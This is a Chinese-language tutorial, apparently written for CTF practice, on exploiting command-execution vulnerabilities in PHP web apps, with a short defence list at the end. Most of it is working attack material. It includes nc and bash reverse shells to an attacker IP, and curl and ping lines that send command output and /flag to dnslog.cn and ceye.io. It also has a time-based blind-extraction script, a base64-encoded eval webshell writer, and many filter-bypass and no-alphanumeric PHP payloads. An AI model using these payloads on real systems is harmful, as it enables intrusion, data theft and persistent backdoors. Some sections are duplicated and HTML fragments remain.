命令执行漏洞全面指南<\/h1>

一、系统命令基础<\/h2>

1.1 系统命令简介<\/h3>
系统命令是在系统终端可执行的预定义命令：<\/p>
Linux默认存储位置：\/bin<\/code><\/li>
Windows默认存储位置：C:\Windows\System32<\/code><\/li>
<\/ul>
1.2 管道符<\/h3>
Windows管道符：<\/h4>

|<\/code>：直接执行后面的语句<\/li>
||<\/code>：前面命令错误则执行后面语句<\/li>
&<\/code>：无论前面真假都执行前后命令<\/li>
&&<\/code>：前面为真才执行两条命令<\/li>
<\/ul>
Linux管道符（额外包含）：<\/h4>

;<\/code>：作用同&<\/code><\/li>
<\/ul>
1.3 通配符（Linux）<\/h3>

?<\/code>：代替任意一个字符<\/li>
*<\/code>：代替0-任意个字符<\/li>
<\/ul>
示例：<\/p>
cat flag ==<\/span> cat fla? ==<\/span> cat f*
<\/span><\/span><\/code><\/pre>1.4 重定向（Linux）<\/h3>

><\/code>：覆盖写入文件<\/li>
>><\/code>：追加写入文件<\/li>
<\/ul>
示例：<\/p>
ls > file.txt    # 覆盖写入<\/span>
<\/span><\/span>> file.txt       # 创建空文件<\/span>
<\/span><\/span>ls >> file.txt   # 追加写入<\/span>
<\/span><\/span><\/code><\/pre>1.5 常见系统命令<\/h3>
Windows常用命令：<\/h4>

ipconfig<\/code>：查看网络配置<\/li>
type<\/code>：查看文件内容<\/li>
cd<\/code>：目录跳转<\/li>
ping<\/code>：测试连通性<\/li>
dir<\/code>：列出目录<\/li>
whoami<\/code>：查看当前用户<\/li>
<\/ul>
Linux常用命令：<\/h4>

ls<\/code>：列出目录<\/li>
cd<\/code>：目录跳转<\/li>
rm<\/code>：删除<\/li>
mv<\/code>：重命名<\/li>
whoami<\/code>：查看当前用户<\/li>
uname -a<\/code>：系统信息<\/li>
ifconfig<\/code>：网络配置<\/li>
ping<\/code>：测试连通性<\/li>
touch<\/code>：创建文件<\/li>
mkdir<\/code>：创建目录<\/li>
<\/ul>
文件读取命令：<\/h4>
cat\/tac\/more\/less\/head\/tail\/nl\/vim\/vi\/nano\/emacs
<\/span><\/span>sed -n '1,10p'<\/span>\/rev\/base64\/strings\/xxd\/hexdump\/od\/uniq
<\/span><\/span><\/code><\/pre>其他实用命令：<\/h4>


find<\/code>：查找文件<\/p>
find \/ -name flag
<\/span><\/span>find \/ -name f*
<\/span><\/span>find \/ -name fla?
<\/span><\/span><\/code><\/pre><\/li>

sed<\/code>：行替换<\/p>
sed -i '2s\/x\.x\.x\.x\/150.158.24.228\/'<\/span> filename
<\/span><\/span><\/code><\/pre><\/li>

echo<\/code>+base64写入<\/p>
echo 'base64数据'<\/span> | base64 -d > filename
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
二、命令执行漏洞利用<\/h2>
2.1 system类命令执行<\/h3>
示例代码：<\/p>
<?<\/span>php<\/span> system<\/span>($_POST['1'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2.1.1 无回显RCE技术<\/h4>

反弹shell技术<\/strong><\/li>
<\/ol>


VPS准备<\/strong>：需要公网服务器（华为云\/腾讯云\/阿里云）<\/p>
<\/li>

NC反弹<\/strong>：<\/p>


正向连接：<\/p>
# Linux靶机<\/span>
<\/span><\/span>nc -e \/bin\/bash -lvvnp 端口
<\/span><\/span># Win靶机<\/span>
<\/span><\/span>nc -e cmd -lvvnp 端口
<\/span><\/span># 攻击机<\/span>
<\/span><\/span>nc 靶机ip 端口
<\/span><\/span><\/code><\/pre><\/li>

反向连接：<\/p>
# Linux靶机<\/span>
<\/span><\/span>nc -e \/bin\/bash 攻击机ip 端口
<\/span><\/span># Win靶机<\/span>
<\/span><\/span>nc -e cmd 攻击机ip 端口
<\/span><\/span># 攻击机<\/span>
<\/span><\/span>nc -lvvnp 端口
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

Bash反弹<\/strong>：<\/p>
# 攻击机<\/span>
<\/span><\/span>nc -lvvnp 端口
<\/span><\/span># 靶机<\/span>
<\/span><\/span>bash -c "bash -i >& \/dev\/tcp\/攻击机ip\/端口 0>&1"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>


数据写出技术<\/strong><\/p>

cp flag.php 1.txt<\/code><\/li>
mv flag.php 1.txt<\/code><\/li>
ls > 1.txt<\/code><\/li>
ls | tee 1.txt<\/code><\/li>
ls | script 1.txt<\/code><\/li>
<\/ul>
<\/li>

数据外带技术<\/strong><\/p>

使用平台：http:\/\/dnslog.cn 或 http:\/\/ceye.io<\/li>
单行传输：
ping `<\/span>whoami`<\/span>.dns地址
<\/span><\/span>curl http:\/\/dns地址\/`<\/span>whoami`<\/span>
<\/span><\/span><\/code><\/pre><\/li>
多行传输：
curl http:\/\/ceye.io\/`<\/span>ls \/ | base64`<\/span>
<\/span><\/span>curl -T \/flag http:\/\/ceye.io\/
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

盲注技术<\/strong><\/p>
import<\/span> requests
<\/span><\/span>import<\/span> string
<\/span><\/span>import<\/span> time
<\/span><\/span>
<\/span><\/span>url =<\/span> 'http:\/\/localhost.test.php\/?c='<\/span>
<\/span><\/span>dic =<\/span> string.<\/span>printable[:-<\/span>6<\/span>]
<\/span><\/span>flag =<\/span> ''<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(1<\/span>,50<\/span>):
<\/span><\/span>    for<\/span> j in<\/span> dic:
<\/span><\/span>        payload =<\/span> f<\/span>'<\/span>{<\/span>url}<\/span>a=$(cat \/flag | head -1 | cut -b <\/span>{<\/span>i}<\/span>);if [ $a = <\/span>{<\/span>j}<\/span> ];then sleep 2;fi'<\/span>
<\/span><\/span>        start =<\/span> time.<\/span>time()
<\/span><\/span>        requests.<\/span>get(payload)
<\/span><\/span>        if<\/span> time.<\/span>time() -<\/span> start ><\/span> 1<\/span>:
<\/span><\/span>            flag +=<\/span> j
<\/span><\/span>            print(flag)
<\/span><\/span>            break<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.1.2 命令行写shell<\/h4>
echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8='<\/span> | base64 -d > .\/123.php
<\/span><\/span># 解码后：<?php eval($_POST[1]);?><\/span>
<\/span><\/span><\/code><\/pre>2.1.3 长度限制绕过<\/h4>
示例payload：<\/p>
`$F `; sleep 3
<\/code><\/pre>
截取后执行：<\/p>
eval<\/span>("``<\/span>$F<\/span> `;sleep 3`"<\/span>); 
<\/span><\/span># 等价于 shell_exec("`$F `; sleep 3");
<\/span><\/span><\/span><\/code><\/pre>2.1.4 命令绕过技术<\/h4>


空格绕过<\/strong>：<\/p>
cat${<\/span>IFS}<\/span>flag.php
<\/span><\/span>cat$IFS$9flag.php
<\/span><\/span>cat<flag.php
<\/span><\/span>cat<>flag.php
<\/span><\/span><\/code><\/pre><\/li>

字符串拼接<\/strong>：<\/p>
a=<\/span>l;b=<\/span>s;$a$b \/
<\/span><\/span><\/code><\/pre><\/li>

编码绕过<\/strong>：<\/p>

Base64：
echo bHMgLw==<\/span> | base64 -d | bash
<\/span><\/span><\/code><\/pre><\/li>
16进制：
echo 6c73202f | xxd -r -p | bash
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

引号绕过<\/strong>：<\/p>
ca''<\/span>t flag
<\/span><\/span>ca""<\/span>t flag
<\/span><\/span><\/code><\/pre><\/li>

反斜杠<\/strong>：<\/p>
l\s<\/span> \/
<\/span><\/span>ca\t<\/span> f\l<\/span>ag
<\/span><\/span><\/code><\/pre><\/li>

IP绕过<\/strong>：<\/p>

127.0.0.1 → 2130706433 或 0x7F000001<\/li>
<\/ul>
<\/li>

正则绕过<\/strong>：<\/p>
cat [<\/span>e-g]<\/span>lag
<\/span><\/span>cat f{<\/span>k..m}<\/span>ag
<\/span><\/span><\/code><\/pre><\/li>

内联执行<\/strong>：<\/p>
cat `<\/span>ls`<\/span>
<\/span><\/span><\/code><\/pre><\/li>

黑洞绕过<\/strong>：<\/p>
ls ||<\/span> >\/dev\/null 2>&1<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.1.5 特殊绕过技术<\/h4>


绕过open_basedir<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>ini_set<\/span>('open_basedir'<\/span>, '\/path\/to\/directory:\/another\/directory'<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>

绕过disable_function<\/strong>：<\/p>
$a=<\/span>fopen<\/span>("flag.php"<\/span>,"r"<\/span>);
<\/span><\/span>while<\/span>(!<\/span>feof<\/span>($a)) { echo<\/span> fgets<\/span>($a); }
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2 eval类命令执行<\/h3>
示例代码：<\/p>
<?<\/span>php<\/span> eval<\/span>($_POST['1'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2.2.1 无字母数字RCE<\/h4>


取反绕过<\/strong>：<\/p>
(~%<\/span>8<\/span>C<\/span>%<\/span>86<\/span>%<\/span>8<\/span>C<\/span>%<\/span>8<\/span>B<\/span>%<\/span>9<\/span>A<\/span>%<\/span>92<\/span>)(~%<\/span>8<\/span>B<\/span>%<\/span>9<\/span>A<\/span>%<\/span>92<\/span>%<\/span>9<\/span>E<\/span>%<\/span>98<\/span>%<\/span>D1<\/span>%<\/span>8<\/span>F<\/span>%<\/span>97<\/span>%<\/span>8<\/span>F<\/span>);
<\/span><\/span># 等价于 system('ls \/');
<\/span><\/span><\/span><\/code><\/pre><\/li>

异或绕过<\/strong>：<\/p>
("%08%08%08%08"<\/span>^<\/span>"%7b%7b%7b%7b"<\/span>)("%08%08%08%08%08%08"<\/span>^<\/span>"%7b%7b%7b%7b%7b%7b"<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

或绕过<\/strong>：<\/p>
("%13%19%13%14%05%0d"<\/span>|<\/span>"%60%60%60%60%60%60"<\/span>)("%0c%13%00%00"<\/span>|<\/span>"%60%60%60%60"<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

自增绕过<\/strong>：<\/p>
$_=<\/span>[];$_=@<\/span>"<\/span>$_<\/span>"<\/span>;$_=<\/span>$_['!'<\/span>==<\/span>'@'<\/span>];$___=<\/span>$_;$__=<\/span>$_;$__++<\/span>;...<\/span>;
<\/span><\/span># 最终构造出 assert($_POST[_]);
<\/span><\/span><\/span><\/code><\/pre><\/li>

临时文件执行<\/strong>：<\/p>
import<\/span> requests
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    url =<\/span> "http:\/\/url\/?c=.+\/???\/????????[@-[]"<\/span>
<\/span><\/span>    r =<\/span> requests.<\/span>post(url, files=<\/span>{"file"<\/span>: ('1.php'<\/span>, b<\/span>'cat flag.php'<\/span>)})
<\/span><\/span>    if<\/span> "flag"<\/span> in<\/span> r.<\/span>text:
<\/span><\/span>        print(r.<\/span>text)
<\/span><\/span>        break<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2.2 无参数RCE<\/h4>
示例代码：<\/p>
if<\/span>(';'<\/span> ===<\/span> preg_replace<\/span>('\/[^\W]+$(?R)?$\/'<\/span>, ''<\/span>, $_GET['code'<\/span>])) {    
<\/span><\/span>    eval<\/span>($_GET['code'<\/span>]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>常用函数组合<\/strong>：<\/p>
show_source<\/span>(next<\/span>(array_reverse<\/span>(scandir<\/span>(current<\/span>(localeconv<\/span>())))));
<\/span><\/span>highlight_file<\/span>(array_rand<\/span>(array_flip<\/span>(scandir<\/span>(getcwd<\/span>()))));
<\/span><\/span>print_r<\/span>(scandir<\/span>(chr<\/span>(ord<\/span>(strrev<\/span>(crypt<\/span>(serialize<\/span>(array<\/span>())))))));
<\/span><\/span><\/code><\/pre>特殊技术<\/strong>：<\/p>


session_id<\/strong>：<\/p>
eval<\/span>(hex2bin<\/span>(session_id<\/span>(session_start<\/span>())));
<\/span><\/span># Session值：phpsessid=706870696e666f28293b (phpinfo();的hex)
<\/span><\/span><\/span><\/code><\/pre><\/li>

getallheaders<\/strong>：<\/p>
eval<\/span>(array_pop<\/span>(getallheaders<\/span>()));
<\/span><\/span># 请求头添加：ZZZZZ=phpinfo();
<\/span><\/span><\/span><\/code><\/pre><\/li>

get_defined_vars<\/strong>：<\/p>
eval<\/span>(pos<\/span>(next<\/span>(array_reverse<\/span>(get_defined_vars<\/span>()))));
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2.3 绕过技术<\/h4>


16进制绕过<\/strong>：<\/p>
"<\/span>\x77\x61\x66\x2e\x70\x68\x70<\/span>"<\/span>  # "waf.php"
<\/span><\/span><\/span><\/code><\/pre><\/li>

chr函数绕过<\/strong>：<\/p>
chr<\/span>(119<\/span>).<\/span>chr<\/span>(97<\/span>).<\/span>chr<\/span>(102<\/span>).<\/span>chr<\/span>(46<\/span>).<\/span>chr<\/span>(112<\/span>).<\/span>chr<\/span>(104<\/span>).<\/span>chr<\/span>(112<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
三、防御建议<\/h2>

严格过滤所有用户输入<\/li>
使用白名单替代黑名单<\/li>
禁用危险函数（如eval、system等）<\/li>
设置open_basedir限制目录访问<\/li>
及时更新系统和应用补丁<\/li>
使用最小权限原则运行服务<\/li>
<\/ol>
四、参考资源<\/h2>

无字母数字webshell之提高篇<\/a><\/li>
命令执行漏洞详解<\/a><\/li>
无字母数字RCE总结<\/a><\/li>
<\/ol>
命令执行漏洞全面指南<\/h1>

一、系统命令基础<\/h2>

1.2 管道符<\/h3>

1.5 常见系统命令<\/h3>

二、命令执行漏洞利用<\/h2>

四、参考资源<\/h2> 无字母数字webshell之提高篇<\/a><\/li> 命令执行漏洞详解<\/a><\/li> 无字母数字RCE总结<\/a><\/li> <\/ol>

四、参考资源<\/h2>

无字母数字webshell之提高篇<\/a><\/li>
命令执行漏洞详解<\/a><\/li>
无字母数字RCE总结<\/a><\/li> <\/ol>
